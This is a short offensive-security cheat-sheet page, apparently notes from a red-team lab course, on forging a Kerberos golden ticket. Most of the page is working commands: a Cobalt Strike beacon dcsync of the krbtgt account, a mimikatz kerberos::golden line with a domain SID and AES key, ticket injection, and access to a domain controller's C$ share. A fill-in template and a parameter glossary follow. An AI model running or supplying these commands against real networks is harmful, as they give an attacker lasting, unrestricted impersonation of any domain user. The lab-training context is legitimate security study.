Golden Ticket

beacon> dcsync dev.cyberbotic.io DEV\krbtgt

mimikatz # kerberos::golden /user:Administrator /domain:dev.cyberbotic.io /sid:S-1-5-21-3263068140-2042698922-2891547269 /aes256:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /ticket:golden.kirbi

beacon> make_token DEV\Administrator FakePass
[+] Impersonated DEV\bfarmer

beacon> kerberos_ticket_use C:\Users\Administrator\Desktop\golden.kirbi
beacon> ls \\dc-2\c$

beacon> rev2self

# OR
kerberos::golden /user:<> /domain:<> /sid:<> /krbtgt:<> /ticket:golden.kirbi
kerberos::ptt golden.kirbi

user: is the username to impersonate (any user)
domain: is the FQDN of the current domain
sid: is the SID of the current domain
krbtgt: is the NTLM hash of the krbtgt account
ticket: is the filename to save as

Use /startoffset, /endin and /renewmax to control the start offset, duration and the maximum renewals (all in minutes).

TIP: Get-DomainPolicy | select -expand KerberosPolicy.

In the golden ticket, you’re not restricted to a single service, you got the KRBTGT so you can create your own TGT, so you can create a TGS for any service you want.

PreviousSilver Ticket NextForest & Domain Trusts

Last updated 3 years ago